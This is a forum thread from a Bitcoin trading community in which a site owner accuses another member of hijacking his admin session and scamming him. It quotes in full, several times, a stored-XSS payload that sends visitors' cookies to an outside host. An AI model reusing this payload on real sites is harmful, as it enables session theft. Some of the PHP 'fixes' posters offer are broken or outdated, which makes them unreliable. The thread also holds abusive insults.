SCAMMER TradeFortress P-T'ed my site without permission, no damage afaik. CLOSED

[MoneypakTrader.com]

UPDATE 6/3 SOLVED, no more entries will be reviewed.

As it goes, I need to block code from being executed and instead print the contents of the mysql block:
Fix this code:
while ($xyz = $mnop->fetch()) {
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }

Pay is $100 in BTC for complete functional substition blocking code execution from the msg fetched and instead display it as plaintext, no code allowed.
SOLVED

END OF REQUEST, BEGIN INFO:

Post *YOUR* code if I'm really using it dumass, you gave me shit, I paid another programmer to actually code the site since your code was non-functional.
Your ARE a scammer unless you can post your functional code, which you obviously can't b/c it doesn't exist.

[...]

[...]

Scammer/Hacker wannabe TF hijacked an admin session via a sql injection directing the admin cookie to his site (code at bottom of post).
His Account info: Created: 2013-06-01 09:01:04, accessed from: 58.111.143.105
User "foobar" : foo@bar.com

There was a few minutes that Scammer/Hacker TF had access to the admin panel.
Fortunately, none of the info there is too bad and this piece of shit might not invade the privacy of the users.

UPDATE: It appears only limited, session information was stolen:
Code used: <script>document.write("<img src='http://bitcoin.hostoi.com/?" + document.cookie + "' style='height: 0px; width: 0px;' />");</script>

[1714885778]

1714885778

[1714885778]

1714885778

[1714885778]

1714885778

[mprep]

Dude, it doesn't seem that you have the reputation (or trust) to back your accusations. Take a deep breath and relax.

[MoneypakTrader.com]

Dude, it doesn't seem that you have the reputation (or trust) to back your accusations. Take a deep breath and relax.

Who do I give root access to my site to back the accusations?
Seems pretty clear cut, the scammer/hacker publicly posted some stolen info (the admin panel view).

[mprep]

Dude, it doesn't seem that you have the reputation (or trust) to back your accusations. Take a deep breath and relax.

Who do I give root access to my site to back the accusations?
Seems pretty clear cut, the scammer/hacker publicly posted some stolen info (the admin panel view).

You clearly are in rage (and in a lot of psychological pain I suppose). Relax because you're trying to tear down a building with a stick.

[The 4ner]

Man this is a heavy accusation. Second accusation I've seen against TF since last month.

[mprep]

Man this is a heavy accusation. Second accusation I've seen against TF since last month.

Yeah, I noticed too. It's kind of beginning to annoy me. He seems to have some kind of serious hatred for TradeFortress.

[MoneypakTrader.com]

Who made the other accusation? Links will help counter troll mprep

[ironcross360]

As it goes, I need to block code from being executed and instead print the contents of the mysql block:
Fix this code:
while ($xyz = $mnop->fetch()) {
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }

Pay is $100 in BTC for complete functional substition blocking code execution from the msg fetched and instead display it as plaintext, no code allowed.

END OF REQUEST, BEGIN INFO:

Post *YOUR* code if I'm really using it dumass, you gave me shit, I paid another programmer to actually code the site since your code was non-functional.
Your ARE a scammer unless you can post your functional code, which you obviously can't b/c it doesn't exist.

Which programmer did you pay? [Either I didn't code that part of your site or my code really is shit], security vulnerability:

[I can't see the code, but did get read/write access to the db, but don't know how the new storage system is named so can't do the bitcoin redirection I attempted]

Scammer/Hacker wannabe attempted to divert deposits from the site, using an aparently custom address for the attempted theft:
Fortunately, he knew so little of the code, he only managed to rewrite his personal deposit address to: 1KentoeyU1VuoD4oCBsnTm3yTXksGRiWww
Account info: Created: 2013-06-01 09:01:04, accessed from: 58.111.143.105
User "foobar" : foo@bar.com
Password Hash was destroyed unfortunately in a hurried attempt to block the hacker.

People may presume the possibility that Scammer/Hacker accessed all the account info generally visible about user account.
Fortunately, none of the info required is too bad and this piece of shit might not invade the privacy of these users (lawsuits are valid against him if he does so).

UPDATE: It appears only limited, session information was stolen, could use help minimizing this damage in the future:
Code used: <script>document.write("<img src='http://bitcoin.hostoi.com/?" + document.cookie + "' style='height: 0px; width: 0px;' />");</script>

Maybe you shouldnt have hacked him first.

[mprep]

Who made the other accusation? Links will help counter troll mprep

Dude, what's your problem? You seem to be full of hatred to everyone. And that's just my opinion that I'm not forcing on to you. I tell what I think and I don't give a damn if you like or care about it or not. You should sit down, relax and stop attacking everyone who's not with you. If I wanted to fight against you, I would've made a separate thread.

[MoneypakTrader.com]

I handle 10's of thousands of dollars for my clients as the hacked info will reveal. the link of the hack picture was posted by tradefortress.

[mprep]

I handle 10's of thousands of dollars for my clients as the hacked info will reveal. the link of the hack picture was posted by tradefortress.

Understood. I wish you good luck in your further pursuits if they are honorable and fair. I don't even want to get between the conflict (or dispute, whatever you call it) with you and TradeFortress.

[MoneypakTrader.com]

Here is his messages in the site that lead to the PHPSESSID HACK
Jun 1, 09:17:41 foobar
Message: So what do I do now? Do I get moneypak codes ? Do I get bitcoin? do I get balance to my debit card? what is your service
Jun 1, 09:16:29 foobar
Message: <script>document.write("<img src='http://bitcoin.hostoi.com/?" + document.cookie + "' style='height: 0px; width: 0px;' />");</script>
Jun 1, 09:02:38 foobar
Message: <b>foo</b>
Jun 1, 09:02:29 foobar
Message: how does this work

[MagicBit15]

Why are you getting hacked so much?

Social engineering or are you just coding that poorly and not debugging properly before you launch?

[wachtwoord]

I PM'ed this but MPT asked to post it here instead:

Hey,

You asked to fix the following code:

Code:

while ($xyz = $mnop->fetch()) {
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }

I'm not sure I get your exact problem. Usually with SQL injection you're scared of plainly using the input of a user. This can be secured against by (where $name is the input):

Code:

if (get_magic_quotes_gpc()) {
 $name = stripslashes($name);
}
$name = mysql_real_escape_string($name);
mysql_query(“SELECT * FROM users WHERE name=’{$name}’”);

Your question seems to be different though as there is no input except for what you retrieve from the database ($xyz['stuff'] ). Doe you mean the content of your database is potentially not trustworthy? If so, I'd recommend not fixing it there but on every place where user code can potentially alter the database using a mechanism such as I proposed in the above code-block.

If I misunderstood and you mean something else altogether, please clarify

Regards

[MoneypakTrader.com]

Why are you getting hacked so much?
Social engineering or are you just coding that poorly and not debugging properly before you launch?

The site was hacked once due to shitty programmers.
I'm not a programmer, the exploited code was written by the coder I paid who delivered his final project in April at the site launch and is refusing to give updates or help anymore with the site since he already got paid.
This might also be a reason scammer TradeFortress tried to hack and steal the site's coins:

I handle 10's of thousands of dollars for my clients as the hacked info will reveal. the link of the hack picture was posted by tradefortress.

It's more like hundreds of BTC, but same difference.

[MoneypakTrader.com]

I PM'ed this but MPT asked to post it here instead:

Hey,
You asked to fix the following code:

Code:

while ($xyz = $mnop->fetch()) {
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }

I'm not sure I get your exact problem. Usually with SQL injection you're scared of plainly using the input of a user. This can be secured against by (where $name is the input):

Code:

if (get_magic_quotes_gpc()) {
 $name = stripslashes($name);
}
$name = mysql_real_escape_string($name);
mysql_query(“SELECT * FROM users WHERE name=’{$name}’”);

Your question seems to be different though as there is no input except for what you retrieve from the database ($xyz['stuff'] ). Doe you mean the content of your database is potentially not trustworthy? If so, I'd recommend not fixing it there but on every place where user code can potentially alter the database using a mechanism such as I proposed in the above code-block.
If I misunderstood and you mean something else altogether, please clarify
Regards

Looks like stripslashes doesn't block opening a line of code, does it?

[MagicBit15]

Why are you getting hacked so much?
Social engineering or are you just coding that poorly and not debugging properly before you launch?

The site was hacked once due to shitty programmers.
I'm not a programmer, the exploited code was written by the coder I paid who delivered his final project in April at the site launch and is refusing to give updates or help anymore with the site since he already got paid.
This might also be a reason scammer TradeFortress tried to hack and steal the site's coins:

I handle 10's of thousands of dollars for my clients as the hacked info will reveal. the link of the hack picture was posted by tradefortress.

It's more like hundreds of BTC, but same difference.

Ah I see that sucks, No way you can contact him? Or is he not responding at all, email or skype or anything?

[🏰 TradeFortress 🏰]

LOL? Prove that I have "changed my deposit address", that was the auto generated one. You can't even change it, bitcoind or Blockchain.info doesn't let you. It looks like a vanity address through  

Anyway, show me the damages I've done to you. Which is nothing other than your sites relutation, which I think is fair - an eye for an eye. I regularly try to break into sites, and I always disclose it to the owners without any malicious damages done. For some people, I do it publicly.

Here: htmlentities( [db output] ). It's funny how there is so many responses yet no one knows basic web security.

[🏰 TradeFortress 🏰]

Thanks for advertising my pentesting skills too!

[danieldaniel]

All you have to do is htmlentities(<data that you want to clean>);

Do that with any user-supplied input before you print it to the screen.

Edit: You can see the PHP page here: http://php.net/manual/en/function.htmlentities.php

Edit Edit:
Fully functioning code:
-Start-
while ($xyz = $mnop->fetch()) {
htmlentities($xyz);
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }
-End-

[Pichu]

lol'd. I wouldn't do service with someone who doesn't secure his website properly before he takes on lots of clients. GJ TradeFortress.

[MagicBit15]

Oh TradeFORtress was the one that coded your site? I didn't read that part, I thought it was someone with a copycat name.

Your an idiot, Tradefortress is a legend, your rant is random, probably fake scam report, and invalid. If your site got hacked by someone else, still your fault, it's your website.

/Thread

[🏰 TradeFortress 🏰]

He is using some of mycode. Two different developers have found it impossible to work with him. What does that tell you about him, or is it always the developers fault?

Anyways, you still have vulnerabilities in your code. This is why you don't do financial sites when you have no basic web security knowledge.

If I am a 'scammer', why did I report a serious vulnerability on this forum you are reading right now instead of compromising the account of anyone I want? Because I don't do that.

[MPOE-PR]

Who do I give root access to my site to back the accusations?

My vote is on Pietila.

[mprep]

Man, this discussion heated up qucikly. Looks like MoneypakTrader does have some anger issues.  

[MoneypakTrader.com]

All you have to do is htmlentities(<data that you want to clean>);

Do that with any user-supplied input before you print it to the screen.

Edit: You can see the PHP page here: http://php.net/manual/en/function.htmlentities.php

Edit Edit:
Fully functioning code:
-Start-
while ($xyz = $mnop->fetch()) {
htmlentities($xyz);
echo '<br /><strong>Message:</strong> '.$xyz['stuff'].'<br />';
      }
-End-

Thanks for trying to help, but your edit failed to work.
I'll investigate the function and find some solution.
Actually, I think I found the correct way to do it and your contribution helped a little.
Where do you want $20 BTC?

[MoneypakTrader.com]

Oh TradeFORtress was the one that coded your site? I didn't read that part, I thought it was someone with a copycat name.
Your an idiot, Tradefortress is a legend, your rant is random, probably fake scam report, and invalid. If your site got hacked by someone else, still your fault, it's your website.
/Thread

Counter-Troll:
He started to code it but failed/refused to finish, kept the 27 BTC I paid him and is now penetration testing me apparently to "advertise"
You're the idiot cause he admitted to all of this (except claims without evidence to have finished my site, particularly strange because another coder claims the same thing in these forums unless he took it down after getting his code p4wned).

[MoneypakTrader.com]

Anyways, you still have vulnerabilities in your code. This is why you don't do financial sites when you have no basic web security knowledge.

If I am a 'scammer', why did I report a serious vulnerability on this forum you are reading right now instead of compromising the account of anyone I want? Because I don't do that.

I appreciate you reporting the severe code vulnerability the coder who did my site introduced, I'll credit you with 3 BTC for the discovery.
Interest for 6 months on the 27 btc you deprived me of is 2.7 BTC (20% interested for involuntary debtor relationship).
You're down to 26.7 BTC that you owe me.
Please continue to penetration test my site to work off your debt.
I've decided to increase it from $360 to $1000 in BTC reward for the next critical vulnerability such as your admin account hack you did. That's a personal rate for you since I like you so much and need to get the solutions to a better site (price must include a full fix of the vulnerabilities discovered).

UPDATE offer refused by TF and retracted by me.

[MoneypakTrader.com]

This problem is solved, please discontinue use/lock the thread.

[Vod]

This problem is solved, please discontinue use/lock the thread.

You can lock your own threads.

[MoneypakTrader.com]

This problem is solved, please discontinue use/lock the thread.

You can lock your own threads.

I know not of this magic

[raze]

Hai im anon and will you pay me to hak ur siet?

[MoneypakTrader.com]

Hai im anon and will you pay me to hak ur siet?

how do you do your forum sig like that?
I like my site the way it is: impenetrable.
I won't be paying for hacking services because the site is unhackable.
If the great TF can't hack it for $1000 in BTC then no one can.

[MoneypakTrader.com]

Thanks for advertising my pentesting skills too!

looks like you're not the only hacker with a colorful sig trolling for work using your minimal coding skills

[MPOE-PR]

I like my site the way it is: impenetrable

Lol good one.

[raze]

I like my site the way it is: impenetrable

Lol good one.

My thoughts exactly.

FYI, if it's on the internet, it's not safe. No exceptions.

looks like you're not the only hacker with a colorful sig trolling for work using your minimal coding skills

Minimal coding skills? Granted, they're not top-of-the-line, but you're the one here with a vulnerable website..

Is that $1k bounty open to the public?

[MoneypakTrader.com]

I like my site the way it is: impenetrable

Lol good one.

My thoughts exactly.

FYI, if it's on the internet, it's not safe. No exceptions.

looks like you're not the only hacker with a colorful sig trolling for work using your minimal coding skills

Minimal coding skills? Granted, they're not top-of-the-line, but you're the one here with a vulnerable website..

Is that $1k bounty open to the public?

I'm not convinced you're a separate identity from tradefortress, prove that to me via torchat first.
If it includes the fix, I could probably do $50-$100 which is well above the standard for hourly contract work.

[🏰 TradeFortress 🏰]

> If it includes the fix, I could probably do $50-$100 which is well above the standard for hourly contract work.

Are you serious?

Btw, your site still has a serious security vulnerability. I'll happily disclose it to you for your sum of $1,000, prepaid to my address. Or escrow with John.

I don't owe you a single satoshi. I have never agreed to a refund for starters, so by that definition I don't owe you anything.

In real value terms, the interest rate would be something like -90% given the gains in BTC. So assuming I gave you a refund, it would be $300 + CPI or another independent assessment of inflation.

[raze]

I'm replying to a CLOSED thread, I'm such a rebel.

[mprep]

I'm replying to a CLOSED thread, I'm such a rebel.

Lol. So much for having this thread locked.

[MoneypakTrader.com]

[...] I don't owe you a single satoshi. I have never agreed to a refund for starters, so by that definition I don't owe you anything.
[...]

I hereby withdraw my offer for your P/T of my site, if you can prove to have conducted the P/T and produced the fixes and related work prior to now, I will credit your debt appropriately.

If anyone wants to assume TF debt, I am willing to assign it to an appropriate charity for collections.

[MPOE-PR]

I'm replying to a CLOSED thread, I'm such a rebel.

Lol. So much for having this thread locked.

OPs implementation of thread locking has a serious vulnerability. Here's a bounty of 15 OMG WTF BBQ for anyone fixing it to be called a scammer.

[MoneypakTrader.com]

[...] I don't owe you a single satoshi. I have never agreed to a refund for starters, so by that definition I don't owe you anything.
[...]

I hereby withdraw my offer for your P/T of my site, [...]

My site received P/T's from 3 different new accounts since I withdrew the offer.
Total vulnerabilities = 0
Site has been upgraded to IMPENETRABLE status.

[raze]

[...] I don't owe you a single satoshi. I have never agreed to a refund for starters, so by that definition I don't owe you anything.
[...]

I hereby withdraw my offer for your P/T of my site, [...]

My site received P/T's from 3 different new accounts since I withdrew the offer.
Total vulnerabilities = 0
Site has been upgraded to IMPENETRABLE status.

3 failed pentests make it impenetrable?

1. "Don't practice until you succeed, practice until you can't fail". I hate to burst your impenetrable bubble, but it only takes one person who knows something the others don't to exploit a site/server.

2. There's no such thing as impenetrable status. If you're smart, you'll stop taunting people to try and exploit your site.

3. You're naive enough to assume that you can keep a totally 100% hack-proof invulnerable site of awesomeness, but no-one else can? Even if there were no vulnerabilities found in your site now, what about tomorrow? Next week? New vulns are found every single day and made public, you can't be safe forever.

So just stop.

[🏰 TradeFortress 🏰]

LOL, your site still has a security vulnerability that lets me do anything as any user (including you). Waiting for your payments.

[MoneypakTrader.com]

LOL, your site still has a security vulnerability that lets me do anything as any user (including you). Waiting for your payments.

Hey Dumbass,
 I already know you're a lying scammer, my memory isn't that bad. Go Fuck off, because we both know my site is rock-solid secure since I hardened it from when you used that simple sql exploit that my original programmer failed to account for. It's been fixed and YOU ARE IMPOTENT.
 You got in once, congrats. If you weren't lying out your assface, you could easily post some *recent* info from the admin panel, maybe a couple lines of the tests I've been running as admin since there's no sensitive info in that.
 Your fraud isn't going to work here. Fool me once, your a scamming scumbag and you're not going to fool me again.
 Even if you had admin access, you still couldn't touch the dozens of BTC being transacted daily as you pointed out earlier and your trolling is clearly the only tool you have to use against me.

[raze]

LOL, your site still has a security vulnerability that lets me do anything as any user (including you). Waiting for your payments.

Hey Dumbass,
 I already know you're a lying scammer, my memory isn't that bad. Go Fuck off, because we both know my site is rock-solid secure since I hardened it from when you used that simple sql exploit that my original programmer failed to account for. It's been fixed and YOU ARE IMPOTENT.
 You got in once, congrats. If you weren't lying out your assface, you could easily post some *recent* info from the admin panel, maybe a couple lines of the tests I've been running as admin since there's no sensitive info in that.
 Your fraud isn't going to work here. Fool me once, your a scamming scumbag and you're not going to fool me again.
 Even if you had admin access, you still couldn't touch the dozens of BTC being transacted daily as you pointed out earlier and your trolling is clearly the only tool you have to use against me.

Eesh, for a professional account, you should probably lay off with those sort of attacks. By all means speak your mind, but just be a little more civil, yeah? You're making your business look bad.

[🏰 TradeFortress 🏰]

LOL, your site still has a security vulnerability that lets me do anything as any user (including you). Waiting for your payments.

Hey Dumbass,
 I already know you're a lying scammer, my memory isn't that bad. Go Fuck off, because we both know my site is rock-solid secure since I hardened it from when you used that simple sql exploit that my original programmer failed to account for. It's been fixed and YOU ARE IMPOTENT.
 You got in once, congrats. If you weren't lying out your assface, you could easily post some *recent* info from the admin panel, maybe a couple lines of the tests I've been running as admin since there's no sensitive info in that.
 Your fraud isn't going to work here. Fool me once, your a scamming scumbag and you're not going to fool me again.
 Even if you had admin access, you still couldn't touch the dozens of BTC being transacted daily as you pointed out earlier and your trolling is clearly the only tool you have to use against me.

First of all, I did not use a SQL injection, I used XSS. Get your facts right.

Do you want to escrow? I send 27 BTC to John. You send 10 BTC. If I break into your site again, I get your 10 BTC. If I fail to do so within a week (and the site has being up), you get 27 BTC.

Also, why the fuck would I steal your coins. I don't do that.

[r3wt]

I got my money on Tradefortress!!!

[MoneypakTrader.com]

LOL, your site still has a security vulnerability that lets me do anything as any user (including you). Waiting for your payments.

[...]
 Your fraud isn't going to work here. Fool me once, your a scamming scumbag and you're not going to fool me again.
 Even if you had admin access, you still couldn't touch the dozens of BTC being transacted daily as you pointed out earlier and your trolling is clearly the only tool you have to use against me.

[...] If I break into your site again, I get your 10 BTC. If I fail to do so within a week (and the site has being up), you get 27 BTC.

So I can either lose 10 btc if you're right (which is less than a 1% possibility) or I can gain nothing if I'm right because it would go to charity (99%+ possibility). Even at those excellent odds it's a losing proposition.
Please STFU and stop harassing my baby with your BS claims.

Also, why the fuck would I steal your coins. I don't do that.

Let's see, maybe because you're a thief and it's in your nature? That's why you defrauded the 27 bitcoins from me with the promise of a functional website (similar to the one I have now) which you could have easily hosted to show you actually did it, but can't because in reality you're incapable to code a bitcoin ecommerce website.

[🏰 TradeFortress 🏰]

I'll send 50 BTC to John. You send 10 BTC to John. I hack your site, I get your 10 BTC and my 50 BTC. I can't hack your site, you get my 50 BTC and your 10 BTC.

When are we doing this? I always love free money

[matt4054]

You had written CLOSED in the subject. You should have sticked to it. You are ridiculing yourself, IMHO. And really... read your FAQ again.... WTF is this

12. I need to know your business incorporation details and/or personal info before I invest. If you don't provide this I'm going to call you a scammer and flame you in the forums or otherwise blackmail you.

No, we won't be providing any of this info or otherwise cooperating with your blackmail attempts. If you persist in attempting to blackmail us, we will respond with countermeasures.

Do you know the difference between a commercial website, a forum post, and a PM?
I would never trust your website after reading such things. Your attitude is childish.
You can call me names now and prove me right, or you could learn a lesson and make some progress...

[MoneypakTrader.com]

LOL, your site still has a security vulnerability that lets me do anything as any user (including you). Waiting for your payments.

[...]
 Your fraud isn't going to work here. Fool me once, your a scamming scumbag and you're not going to fool me again.
 Even if you had admin access, you still couldn't touch the dozens of BTC being transacted daily as you pointed out earlier and your trolling is clearly the only tool you have to use against me.

[...] If I break into your site again, I get your 10 BTC. If I fail to do so within a week (and the site has being up), you get 27 BTC.

So I can either lose 10 btc if you're right (which is less than a 1% possibility) or I can gain nothing if I'm right because it would go to charity (99%+ possibility). Even at those excellent odds it's a losing proposition.
Please STFU and stop harassing my baby with your BS claims.

Also, why the fuck would I steal your coins. I don't do that.

Let's see, maybe because you're a thief and it's in your nature? That's why you defrauded the 27 bitcoins from me with the promise of a functional website (similar to the one I have now) [but] in reality you're incapable to code a bitcoin ecommerce website.

Maybe I didn't make it clear: I have no intention of ever doing any kind of business with you ever again.
The fact that the scumbag who scammed me out of 27 BTC is asking me to send coins to someone makes me sick.
You defrauded me out of 27 BTC, congrats, I'm not going to take any risk of legitimizing your theft.
I overlooked the fact that you illegally hacked into my site with a simple exploit, I even reduced your debt.
I also gave you the opportunity to come clean and reveal any information you have about site vulnerabilities for more debt reduction. You refused and that deal is now over so go fuck yourself you sorry scamming bastard.

[MoneypakTrader.com]

BTW, your offer sounds just like the time:
A) you offered to pay for arbitration,
B) You NEVER filed the case, so I filed one with the option of splitting the fee
C) I paid half the fee after you refused to pay the full fee as you originally promised
D) You then REFUSED to pay even half the arbitration fee
E) Then you REFUSED to participate in arbitration blaming the arbitrator for taking to long

It's all in the forum records. . .

I have learned to give your promises the appropriate weight they deserve.

[🏰 TradeFortress 🏰]

tl;dr: MPT blundered by making statements that he now backtracks.

I'm happy to do this through an escrow.

[whiskers75]

TF: Stop writing "has been" as "has being"!
Erm.... TradeFortress, prove that you can hack in by, I don't know, changing the admin user's name?

[MoneypakTrader.com]

LOL, your site still has a security vulnerability that lets me do anything as any user (including you). Waiting for your payments.

[...]
 Your fraud isn't going to work here. Fool me once, your a scamming scumbag and you're not going to fool me again.
 Even if you had admin access, you still couldn't touch the dozens of BTC being transacted daily as you pointed out earlier and your trolling is clearly the only tool you have to use against me.

[...] If I break into your site again, I get your 10 BTC. If I fail to do so within a week (and the site has being up), you get 27 BTC.

So I can either lose 10 btc if you're right (which is less than a 1% possibility) or I can gain nothing if I'm right because it would go to charity (99%+ possibility). Even at those excellent odds it's a losing proposition.
Please STFU and stop harassing my baby with your BS claims.

Also, why the fuck would I steal your coins. I don't do that.

Let's see, maybe because you're a thief and it's in your nature? That's why you defrauded the 27 bitcoins from me with the promise of a functional website (similar to the one I have now) [but] in reality you're incapable to code a bitcoin ecommerce website.

Maybe I didn't make it clear: I have no intention of ever doing any kind of business with you ever again.
The fact that the scumbag who scammed me out of 27 BTC is asking me to send coins to someone makes me sick.
You defrauded me out of 27 BTC, congrats, I'm not going to take any risk of legitimizing your theft.
I overlooked the fact that you illegally hacked into my site with a simple exploit, I even reduced your debt.
I also gave you the opportunity to come clean and reveal any information you have about site vulnerabilities for more debt reduction. You refused and that deal is now over so go fuck yourself you sorry scamming bastard.

TF, you sound like a rapist trying to get into a victims house after having already raped the victim before, not gonna happen.

You show how much of a scumbag you are by attempting to extort more money having already scammed me for supposedly coding a complete site. And now you want more coin for making the site more secure after already fraudulently stolen more than enough coin to cover security updates (even though you are unwelcome from participating in the site at all, but you persist in harassing me about the site).
Attacking someone's site without permission and then trying to extort money from them is a real scumbag move, even though you're bullshitting and especially because you've already stolen enough to cover security fixes.
Fortunately, there's no evidence you have any current access to the admin panel or user accounts or you could verify it by posting some *recent* activity. Although the ethical thing to do is disclose the vulnerability, which you could even do publicly. But you're an unethical criminal who likes making easy coins by stealing them from me as you did with your fraudulent "I'm a web developer who can code a bitcoin accepting website" bullshit. Hard to imagine anyone can go through the whole history and take your side on this issue. . .
The code has been fixed and the site is secure, so Go Fuck Yourself.